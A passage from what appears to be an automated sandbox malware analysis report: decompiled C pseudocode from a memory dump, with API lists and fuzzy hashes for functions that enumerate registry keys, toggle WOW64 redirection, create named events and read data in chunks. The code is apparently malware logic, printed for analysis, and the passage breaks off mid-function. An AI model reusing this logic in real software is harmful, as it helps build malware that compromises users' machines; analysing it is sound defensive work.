                                                        • Opcode ID: 81a5e126e844464c7649ade1a39c0295ecc25a8bfa735c1f163940f24e525a29
                                                        • Instruction ID: 8cb030e04c3fc8863159aa0a63562735fd1a10f1c8617c8fceaa035f9059d0aa
                                                        • Opcode Fuzzy Hash: 81a5e126e844464c7649ade1a39c0295ecc25a8bfa735c1f163940f24e525a29
                                                        • Instruction Fuzzy Hash: 4711C2379212277B87237BB89C88C7F7BAE9E556543051316F608A7283CE74DD0187E4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 01203686: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,057689D0,01204DD1,?,?,?,?,?,?,?,?,?,?,?,01204DD1), ref: 01203752
                                                          • Part of subcall function 01206566: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 012065A3
                                                          • Part of subcall function 01206566: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 012065D4
                                                        • SysAllocString.OLEAUT32(?), ref: 01204DFD
                                                        • SysAllocString.OLEAUT32(0070006F), ref: 01204E11
                                                        • SysAllocString.OLEAUT32(00000000), ref: 01204E23
                                                        • SysFreeString.OLEAUT32(00000000), ref: 01204E87
                                                        • SysFreeString.OLEAUT32(00000000), ref: 01204E96
                                                        • SysFreeString.OLEAUT32(00000000), ref: 01204EA1
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                         • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                         • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                         • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                         • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                                        • String ID:
                                                        • API String ID: 2831207796-0
                                                        • Opcode ID: 7d05cd251f6fc427c113cbdf6dfbcf3cf5d5e62d48fbd4c4c3d96d7f07dbcc29
                                                        • Instruction ID: f8663a081d3123b3b4ddd89a9fd31bfeb45e3bee0c30e59f13678575e05df3b4
                                                        • Opcode Fuzzy Hash: 7d05cd251f6fc427c113cbdf6dfbcf3cf5d5e62d48fbd4c4c3d96d7f07dbcc29
                                                        • Instruction Fuzzy Hash: CD317132D10609AFDF02EFACD848A9FBBB6AF48304F148525EA14EB151DB719D05CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 88%
                                                        			E01205448(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                        				signed int _v8;
                                                        				char _v12;
                                                        				signed int* _v16;
                                                        				char _v284;
                                                        				void* __esi;
                                                        				char* _t59;
                                                        				intOrPtr* _t60;
                                                        				void* _t62;
                                                        				intOrPtr _t64;
                                                        				char _t65;
                                                        				void* _t67;
                                                        				intOrPtr _t68;
                                                        				intOrPtr _t69;
                                                        				intOrPtr _t71;
                                                        				void* _t73;
                                                        				signed int _t81;
                                                        				void* _t91;
                                                        				void* _t92;
                                                        				char _t98;
                                                        				signed int* _t100;
                                                        				intOrPtr* _t101;
                                                        				void* _t102;
                                                        
                                                        				_t92 = __ecx;
                                                        				_v8 = _v8 & 0x00000000;
                                                        				_t98 = _a16;
                                                        				if(_t98 == 0) {
                                                        					__imp__( &_v284,  *0x120a38c);
                                                        					_t91 = 0x80000002;
                                                        					L6:
                                                        					_t59 = E01203FC1( &_v284,  &_v284);
                                                        					_a8 = _t59;
                                                        					if(_t59 == 0) {
                                                        						_v8 = 8;
                                                        						L29:
                                                        						_t60 = _a20;
                                                        						if(_t60 != 0) {
                                                        							 *_t60 =  *_t60 + 1;
                                                        						}
                                                        						return _v8;
                                                        					}
                                                        					_t101 = _a24;
                                                        					_t62 = E012069FD(_t92, _t97, _t101, _t91, _t59); // executed
                                                        					if(_t62 != 0) {
                                                        						L27:
                                                        						E012013CC(_a8);
                                                        						goto L29;
                                                        					}
                                                        					_t64 =  *0x120a2cc; // 0x5769cd0
                                                        					_t16 = _t64 + 0xc; // 0x5769dc4
                                                        					_t65 = E01203FC1(_t64,  *_t16);
                                                        					_a24 = _t65;
                                                        					if(_t65 == 0) {
                                                        						L14:
                                                        						_t29 = _t101 + 0x14; // 0x102
                                                        						_t33 = _t101 + 0x10; // 0x3d012090, executed
                                                        						_t67 = E01201E65(_t97,  *_t33, _t91, _a8,  *0x120a384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
                                                        						if(_t67 == 0) {
                                                        							_t68 =  *0x120a2d4; // 0x455d5a8
                                                        							if(_t98 == 0) {
                                                        								_t35 = _t68 + 0x120b9ef; // 0x4d4c4b48
                                                        								_t69 = _t35;
                                                        							} else {
                                                        								_t34 = _t68 + 0x120b907; // 0x55434b48
                                                        								_t69 = _t34;
                                                        							}
                                                        							if(E01206414(_t69,  *0x120a384,  *0x120a388,  &_a24,  &_a16) == 0) {
                                                        								if(_t98 == 0) {
                                                        									_t71 =  *0x120a2d4; // 0x455d5a8
                                                        									_t44 = _t71 + 0x120b892; // 0x74666f53
                                                        									_t73 = E01203FC1(_t44, _t44);
                                                        									_t99 = _t73;
                                                        									if(_t73 == 0) {
                                                        										_v8 = 8;
                                                        									} else {
                                                        										_t47 = _t101 + 0x10; // 0x3d012090
                                                        										E0120304F( *_t47, _t91, _a8,  *0x120a388, _a24);
                                                        										_t49 = _t101 + 0x10; // 0x3d012090
                                                        										E0120304F( *_t49, _t91, _t99,  *0x120a380, _a16);
                                                        										E012013CC(_t99);
                                                        									}
                                                        								} else {
                                                        									_t40 = _t101 + 0x10; // 0x3d012090, executed
                                                        									E0120304F( *_t40, _t91, _a8,  *0x120a388, _a24); // executed
                                                        									_t43 = _t101 + 0x10; // 0x3d012090
                                                        									E0120304F( *_t43, _t91, _a8,  *0x120a380, _a16);
                                                        								}
                                                        								if( *_t101 != 0) {
                                                        									E012013CC(_a24);
                                                        								} else {
                                                        									 *_t101 = _a16;
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L27;
                                                        					}
                                                        					_t21 = _t101 + 0x10; // 0x3d012090, executed
                                                        					_t81 = E01203B91( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
                                                        					if(_t81 == 0) {
                                                        						_t100 = _v16;
                                                        						if(_v12 == 0x28) {
                                                        							 *_t100 =  *_t100 & _t81;
                                                        							_t26 = _t101 + 0x10; // 0x3d012090
                                                        							E01201E65(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                                        						}
                                                        						E012013CC(_t100);
                                                        						_t98 = _a16;
                                                        					}
                                                        					E012013CC(_a24);
                                                        					goto L14;
                                                        				}
                                                        				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                        					goto L29;
                                                        				} else {
                                                        					_t97 = _a8;
                                                        					E012077FF(_t98, _a8,  &_v284);
                                                        					__imp__(_t102 + _t98 - 0x117,  *0x120a38c);
                                                        					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                                        					_t91 = 0x80000003;
                                                        					goto L6;
                                                        				}
                                                        			}

                                                        APIs
                                                        • StrChrA.SHLWAPI(0120755B,0000005F,00000000,00000000,00000104), ref: 0120547B
                                                        • lstrcpy.KERNEL32(?,?), ref: 012054A8
                                                          • Part of subcall function 01203FC1: lstrlen.KERNEL32(?,00000000,05769CD0,7742C740,012035B6,05769ED5,0120454B,0120454B,?,0120454B,?,69B25F44,E8FA7DD7,00000000), ref: 01203FC8
                                                          • Part of subcall function 01203FC1: mbstowcs.NTDLL ref: 01203FF1
                                                          • Part of subcall function 01203FC1: memset.NTDLL ref: 01204003
                                                          • Part of subcall function 0120304F: lstrlenW.KERNEL32(?,?,?,01205611,3D012090,80000002,0120755B,01203E52,74666F53,4D4C4B48,01203E52,?,3D012090,80000002,0120755B,?), ref: 01203074
                                                          • Part of subcall function 012013CC: RtlFreeHeap.NTDLL(00000000,00000000,012020F3,00000000,00000000,?,00000000,?,?,?,?,?,012068A9,00000000,?,00000001), ref: 012013D8
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 012054CA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                        • String ID: ($\
                                                        • API String ID: 3924217599-1512714803
                                                        • Opcode ID: a51436ce587964b4370b8673c3b3c9f9c30fd59450a797c86b7fe8598ab29c8b
                                                        • Instruction ID: c4d906e70f1f096d793bf86b7d3f4d438f8286e2424923119c86b2e2ad7b805d
                                                        • Opcode Fuzzy Hash: a51436ce587964b4370b8673c3b3c9f9c30fd59450a797c86b7fe8598ab29c8b
                                                        • Instruction Fuzzy Hash: DF51397112020BAFDF239F64EC48EAA7BBAEF18314F508614FA15925A3D735D925DF10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 32%
                                                        			E0120663C(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
                                                        				intOrPtr _v36;
                                                        				intOrPtr _v44;
                                                        				intOrPtr _v48;
                                                        				intOrPtr _v52;
                                                        				void _v60;
                                                        				char _v64;
                                                        				long _t18;
                                                        				intOrPtr _t22;
                                                        				intOrPtr _t23;
                                                        				long _t29;
                                                        				intOrPtr _t30;
                                                        				intOrPtr _t31;
                                                        				intOrPtr* _t32;
                                                        
                                                        				_t30 = __edi;
                                                        				_t29 = _a4;
                                                        				_t31 = __eax;
                                                        				_t18 = E01204DA1(_t29, __edi, __eax); // executed
                                                        				_a4 = _t18;
                                                        				if(_t18 != 0) {
                                                        					memset( &_v60, 0, 0x38);
                                                        					_t22 =  *0x120a2d4; // 0x455d5a8
                                                        					_v64 = 0x3c;
                                                        					if(_a8 == 0) {
                                                        						_t7 = _t22 + 0x120b4e0; // 0x70006f
                                                        						_t23 = _t7;
                                                        					} else {
                                                        						_t6 = _t22 + 0x120b90c; // 0x750072
                                                        						_t23 = _t6;
                                                        					}
                                                        					_v36 = _t31;
                                                        					_t32 = __imp__;
                                                        					_v52 = _t23;
                                                        					_v48 = _t29;
                                                        					_v44 = _t30;
                                                        					 *_t32(0);
                                                        					_push( &_v64);
                                                        					if( *0x120a100() != 0) {
                                                        						_a4 = _a4 & 0x00000000;
                                                        					} else {
                                                        						_a4 = GetLastError();
                                                        					}
                                                        					 *_t32(1);
                                                        				}
                                                        				return _a4;
                                                        			}

                                                        APIs
                                                          • Part of subcall function 01204DA1: SysAllocString.OLEAUT32(?), ref: 01204DFD
                                                          • Part of subcall function 01204DA1: SysAllocString.OLEAUT32(0070006F), ref: 01204E11
                                                          • Part of subcall function 01204DA1: SysAllocString.OLEAUT32(00000000), ref: 01204E23
                                                          • Part of subcall function 01204DA1: SysFreeString.OLEAUT32(00000000), ref: 01204E87
                                                        • memset.NTDLL ref: 01206660
                                                        • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0120669C
                                                        • GetLastError.KERNEL32 ref: 012066AC
                                                        • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 012066BD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                                        • String ID: <
                                                        • API String ID: 593937197-4251816714
                                                        • Opcode ID: 05939db0b5e3e37f4b2c2df1086f9530fa302f3e46f42deca7728ebb58de455b
                                                        • Instruction ID: 381665663b0a503b582a6ed32b312719e8503f997c5790162ec28a73703cf301
                                                        • Opcode Fuzzy Hash: 05939db0b5e3e37f4b2c2df1086f9530fa302f3e46f42deca7728ebb58de455b
                                                        • Instruction Fuzzy Hash: DF113071910219AFDB11DF69DC89BDD7BB8AB08384F008216E905E7282D7B49644CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E01204BAC(signed int _a4, signed int* _a8) {
                                                        				void* __ecx;
                                                        				void* __edi;
                                                        				signed int _t6;
                                                        				intOrPtr _t8;
                                                        				intOrPtr _t12;
                                                        				void* _t18;
                                                        				long _t21;
                                                        				void* _t25;
                                                        				void* _t26;
                                                        				signed int* _t27;
                                                        				signed short* _t28;
                                                        				CHAR* _t30;
                                                        				long _t31;
                                                        				WCHAR** _t32;
                                                        
                                                        				_t6 =  *0x120a2c8; // 0xbd092303
                                                        				_t32 = _a4;
                                                        				_a4 = _t6 ^ 0xd05b5869;
                                                        				_t8 =  *0x120a2d4; // 0x455d5a8
                                                        				_t3 = _t8 + 0x120b84d; // 0x61636f4c
                                                        				_t25 = 0;
                                                        				_t30 = E01203D0E(_t3, 1);
                                                        				if(_t30 != 0) {
                                                        					_t25 = CreateEventA(0x120a2f8, 1, 0, _t30);
                                                        					E012013CC(_t30);
                                                        				}
                                                        				_t12 =  *0x120a2b4; // 0x4000000a
                                                        				if(_t12 != 6 || _t12 < 2) {
                                                        					if( *_t32 == 0) {
                                                        						goto L11;
                                                        					}
                                                        					_t18 = E01202102(); // executed
                                                        					if(_t18 != 0) {
                                                        						goto L11;
                                                        					}
                                                        					_t28 = StrChrW( *_t32, 0x20);
                                                        					if(_t28 != 0) {
                                                        						 *_t28 =  *_t28 & 0x00000000;
                                                        						_t28 =  &(_t28[1]);
                                                        					}
                                                        					_t21 = E0120663C(0, _t28,  *_t32, 0); // executed
                                                        					_t31 = _t21;
                                                        					if(_t31 == 0) {
                                                        						if(_t25 == 0) {
                                                        							goto L21;
                                                        						}
                                                        						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                        						if(_t31 == 0) {
                                                        							goto L19;
                                                        						}
                                                        					}
                                                        					goto L11;
                                                        				} else {
                                                        					L11:
                                                        					_t27 = _a8;
                                                        					if(_t27 != 0) {
                                                        						 *_t27 =  *_t27 | 0x00000001;
                                                        					}
                                                        					_t31 = E01202F12(_t32, _t26);
                                                        					if(_t31 == 0 && _t25 != 0) {
                                                        						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                        					}
                                                        					if(_t27 != 0 && _t31 != 0) {
                                                        						 *_t27 =  *_t27 & 0xfffffffe;
                                                        					}
                                                        					L19:
                                                        					if(_t25 != 0) {
                                                        						CloseHandle(_t25);
                                                        					}
                                                        					L21:
                                                        					return _t31;
                                                        				}
                                                        			}

                                                        APIs
                                                          • Part of subcall function 01203D0E: lstrlen.KERNEL32(E8FA7DD7,00000000,69B25F44,00000027,00000000,05769CD0,7742C740,0120454B,?,69B25F44,E8FA7DD7,00000000,?,?,?,0120454B), ref: 01203D44
                                                          • Part of subcall function 01203D0E: lstrcpy.KERNEL32(00000000,00000000), ref: 01203D68
                                                          • Part of subcall function 01203D0E: lstrcat.KERNEL32(00000000,00000000), ref: 01203D70
                                                        • CreateEventA.KERNEL32(0120A2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,0120757A,?,?,?), ref: 01204BEB
                                                          • Part of subcall function 012013CC: RtlFreeHeap.NTDLL(00000000,00000000,012020F3,00000000,00000000,?,00000000,?,?,?,?,?,012068A9,00000000,?,00000001), ref: 012013D8
                                                        • StrChrW.SHLWAPI(0120757A,00000020,61636F4C,00000001,00000000,?,?,00000000,?,0120757A,?,?,?), ref: 01204C1B
                                                        • WaitForSingleObject.KERNEL32(00000000,00004E20,0120757A,00000000,?,00000000,?,0120757A,?,?,?,?,?,?,?,0120519C), ref: 01204C49
                                                        • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,0120757A,?,?,?), ref: 01204C77
                                                        • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,0120757A,?,?,?), ref: 01204C8F
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                        • String ID:
                                                        • API String ID: 73268831-0
                                                        • Opcode ID: 45e6d128e4de8d7d39ea5e3f1cc7d9793e53257489fbcd13880fa1f97ce8b353
                                                        • Instruction ID: 89e0a77b8a1293bee92f1f1ada0662365399e5164f6fb70d4ee277dd28b1f5ec
                                                        • Opcode Fuzzy Hash: 45e6d128e4de8d7d39ea5e3f1cc7d9793e53257489fbcd13880fa1f97ce8b353
                                                        • Instruction Fuzzy Hash: B721D6725213536BE7336B6CA88CB5A77E9AB54750F058325FF069B1C7DB71C8404740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 66%
                                                        			E012013E1(void* __eax) {
                                                        				long _v8;
                                                        				char _v12;
                                                        				char _v16;
                                                        				intOrPtr _v20;
                                                        				void* _v24;
                                                        				void* __esi;
                                                        				void* _t41;
                                                        				char* _t42;
                                                        				long _t43;
                                                        				char* _t45;
                                                        				intOrPtr _t46;
                                                        				intOrPtr* _t47;
                                                        				char _t49;
                                                        				long _t53;
                                                        				char* _t54;
                                                        				long _t55;
                                                        				intOrPtr* _t56;
                                                        				void* _t59;
                                                        				void* _t60;
                                                        				void* _t67;
                                                        				void* _t71;
                                                        				void* _t72;
                                                        				void* _t73;
                                                        				void* _t77;
                                                        
                                                        				_t71 = __eax;
                                                        				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                        					L2:
                                                        					_t41 = _t71;
                                                        					_pop(_t72);
                                                        					_t73 = _t41;
                                                        					_t42 =  &_v12;
                                                        					_v8 = 0;
                                                        					_v16 = 0;
                                                        					__imp__( *((intOrPtr*)(_t73 + 0x18)), _t42, _t67, _t72, _t60, _t77);
                                                        					if(_t42 == 0) {
                                                        						_t43 = GetLastError();
                                                        						_v8 = _t43;
                                                        						if(_t43 == 0x2efe) {
                                                        							_v8 = 0;
                                                        							goto L29;
                                                        						}
                                                        					} else {
                                                        						if(_v12 == 0) {
                                                        							L29:
                                                        							 *((intOrPtr*)(_t73 + 0x30)) = 0;
                                                        						} else {
                                                        							_t45 =  &_v24;
                                                        							_push(_t45);
                                                        							_push(1);
                                                        							_push(0); // executed
                                                        							E0120A144(); // executed
                                                        							if(_t45 != 0) {
                                                        								_v8 = 8;
                                                        							} else {
                                                        								_t46 = E01205FBC(0x1000);
                                                        								_v20 = _t46;
                                                        								if(_t46 == 0) {
                                                        									_v8 = 8;
                                                        								} else {
                                                        									goto L8;
                                                        									do {
                                                        										while(1) {
                                                        											L8:
                                                        											_t49 = _v12;
                                                        											if(_t49 >= 0x1000) {
                                                        												_t49 = 0x1000;
                                                        											}
                                                        											__imp__( *((intOrPtr*)(_t73 + 0x18)), _v20, _t49,  &_v16);
                                                        											if(_t49 == 0) {
                                                        												break;
                                                        											}
                                                        											_t56 = _v24;
                                                        											 *((intOrPtr*)( *_t56 + 0x10))(_t56, _v20, _v16, 0);
                                                        											_t18 =  &_v12;
                                                        											 *_t18 = _v12 - _v16;
                                                        											if( *_t18 != 0) {
                                                        												continue;
                                                        											} else {
                                                        											}
                                                        											L14:
                                                        											if(WaitForSingleObject( *0x120a2c4, 0) != 0x102) {
                                                        												_v8 = 0x102;
                                                        											} else {
                                                        												_t54 =  &_v12;
                                                        												__imp__( *((intOrPtr*)(_t73 + 0x18)), _t54); // executed
                                                        												if(_t54 != 0) {
                                                        													goto L19;
                                                        												} else {
                                                        													_t55 = GetLastError();
                                                        													_v8 = _t55;
                                                        													if(_t55 == 0x2f78 && _v12 == 0) {
                                                        														_v8 = 0;
                                                        														goto L19;
                                                        													}
                                                        												}
                                                        											}
                                                        											L22:
                                                        											E012013CC(_v20);
                                                        											if(_v8 == 0) {
                                                        												_t53 = E01201675(_v24, _t73); // executed
                                                        												_v8 = _t53;
                                                        											}
                                                        											goto L25;
                                                        										}
                                                        										_v8 = GetLastError();
                                                        										goto L14;
                                                        										L19:
                                                        									} while (_v12 != 0);
                                                        									goto L22;
                                                        								}
                                                        								L25:
                                                        								_t47 = _v24;
                                                        								 *((intOrPtr*)( *_t47 + 8))(_t47);
                                                        							}
                                                        						}
                                                        					}
                                                        					return _v8;
                                                        				} else {
                                                        					_t59 = E0120142C(__eax); // executed
                                                        					if(_t59 != 0) {
                                                        						return _t59;
                                                        					} else {
                                                        						goto L2;
                                                        					}
                                                        				}
                                                        			}

                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,01204AFA,00000000,?), ref: 01201F47
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,01204AFA,00000000,?,?), ref: 01201F67
                                                          • Part of subcall function 0120142C: wcstombs.NTDLL ref: 012014EC
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: ErrorLastObjectSingleWaitwcstombs
                                                        • String ID:
                                                        • API String ID: 2344289193-0
                                                        • Opcode ID: 0fabe744772a3677ec50d005a0fbc65b5cc76968640ea4845157d644b6acf0fc
                                                        • Instruction ID: 7c4275388f6e221b6d64c0bac812203941ccbbf4c9f3f314956452ae53bd46bf
                                                        • Opcode Fuzzy Hash: 0fabe744772a3677ec50d005a0fbc65b5cc76968640ea4845157d644b6acf0fc
                                                        • Instruction Fuzzy Hash: EB414E7092020AEFDF22DF98D9889ADBBB9FF14345F50426DE502E7192D770DA909B10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E01203D85(void* __ecx, intOrPtr _a4) {
                                                        				int* _v8;
                                                        				int _v12;
                                                        				int* _v16;
                                                        				int _v20;
                                                        				int* _v24;
                                                        				char* _v28;
                                                        				void* _v32;
                                                        				long _t33;
                                                        				char* _t35;
                                                        				long _t39;
                                                        				long _t42;
                                                        				intOrPtr _t47;
                                                        				void* _t51;
                                                        				long _t53;
                                                        
                                                        				_t51 = __ecx;
                                                        				_v8 = 0;
                                                        				_v16 = 0;
                                                        				_v12 = 0;
                                                        				_v24 = 0;
                                                        				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
                                                        				_t53 = _t33;
                                                        				if(_t53 != 0) {
                                                        					L18:
                                                        					return _t53;
                                                        				}
                                                        				_t53 = 8;
                                                        				_t35 = E01205FBC(0x104);
                                                        				_v28 = _t35;
                                                        				if(_t35 == 0) {
                                                        					L17:
                                                        					RegCloseKey(_v32);
                                                        					goto L18;
                                                        				}
                                                        				_v20 = 0x104;
                                                        				do {
                                                        					_v16 = _v20;
                                                        					_v12 = 0x104;
                                                        					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
                                                        					_t53 = _t39;
                                                        					if(_t53 != 0xea) {
                                                        						if(_t53 != 0) {
                                                        							L14:
                                                        							if(_t53 == 0x103) {
                                                        								_t53 = 0;
                                                        							}
                                                        							L16:
                                                        							E012013CC(_v28);
                                                        							goto L17;
                                                        						}
                                                        						_t42 = E01205448(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
                                                        						_t53 = _t42;
                                                        						if(_t53 != 0) {
                                                        							goto L14;
                                                        						}
                                                        						goto L12;
                                                        					}
                                                        					if(_v12 <= 0x104) {
                                                        						if(_v16 <= _v20) {
                                                        							goto L16;
                                                        						}
                                                        						E012013CC(_v24);
                                                        						_v20 = _v16;
                                                        						_t47 = E01205FBC(_v16);
                                                        						_v24 = _t47;
                                                        						if(_t47 != 0) {
                                                        							L6:
                                                        							_t53 = 0;
                                                        							goto L12;
                                                        						}
                                                        						_t53 = 8;
                                                        						goto L16;
                                                        					}
                                                        					_v8 = _v8 + 1;
                                                        					goto L6;
                                                        					L12:
                                                        				} while (WaitForSingleObject( *0x120a2c4, 0) == 0x102);
                                                        				goto L16;
                                                        			}

                                                        APIs
                                                        • RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,0120755B,?), ref: 01203DAB
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • RegEnumKeyExA.KERNELBASE(?,?,?,0120755B,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,0120755B), ref: 01203DF2
                                                        • WaitForSingleObject.KERNEL32(00000000,?,?,?,0120755B,?,0120755B,?,?,?,?,?,0120755B,?), ref: 01203E5F
                                                        • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,0120755B,?,?,?,?,?,0120519C,?), ref: 01203E87
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                                        • String ID:
                                                        • API String ID: 3664505660-0
                                                        • Opcode ID: 612156bd98b874a32b685c5c0fbaaf09bb686d3b9a21c64bbebc3aa313620713
                                                        • Instruction ID: c3c06d6e982ab1308007afa8b6fdefeca00856a4692a78d9399df56b8e2fe1d8
                                                        • Opcode Fuzzy Hash: 612156bd98b874a32b685c5c0fbaaf09bb686d3b9a21c64bbebc3aa313620713
                                                        • Instruction Fuzzy Hash: 96311B75D1021AAFDF23EBA9D8489EFFEB9FF44310F104266E615B2192D2744E809B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SysAllocString.OLEAUT32(80000002), ref: 01204CF6
                                                        • SysAllocString.OLEAUT32(012054F6), ref: 01204D39
                                                        • SysFreeString.OLEAUT32(00000000), ref: 01204D4D
                                                        • SysFreeString.OLEAUT32(00000000), ref: 01204D5B
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: String$AllocFree
                                                        • String ID:
                                                        • API String ID: 344208780-0
                                                        • Opcode ID: 10eb6a5a97180364da48c4b5025228d907d59cdd7f57d04c3fa82333625ca871
                                                        • Instruction ID: 8fe8c7997944b19ab478912974246abccc51105218f5183cdfdfef7627184b6b
                                                        • Opcode Fuzzy Hash: 10eb6a5a97180364da48c4b5025228d907d59cdd7f57d04c3fa82333625ca871
                                                        • Instruction Fuzzy Hash: FA31A47181014AEFCB16EF9CD4C48AE7BB5FF48340B10862EFA0A97252D7359641CF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 41%
                                                        			E012074CB(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                        				intOrPtr _v12;
                                                        				void* _v16;
                                                        				void* _v28;
                                                        				char _v32;
                                                        				void* __esi;
                                                        				void* _t20;
                                                        				signed int* _t23;  /* used below but left undeclared in the decompiler output */
                                                        				void* _t26;
                                                        				void* _t29;
                                                        				void* _t36;        /* holds the incoming __ecx context pointer; added declaration */
                                                        				void* _t38;
                                                        				signed int* _t39;
                                                        				void* _t40;
                                                        				void* _t41;        /* temporary for the buffer from E0120249F; added declaration */
                                                        
                                                        				_t36 = __ecx;
                                                        				_v32 = 0;
                                                        				asm("stosd");
                                                        				asm("stosd");
                                                        				asm("stosd");
                                                        				asm("stosd");
                                                        				asm("stosd");
                                                        				_v12 = _a4;
                                                        				_t20 = E01207770(__ecx,  &_v32); // executed
                                                        				_t38 = _t20;
                                                        				if(_t38 != 0) {
                                                        					L12:
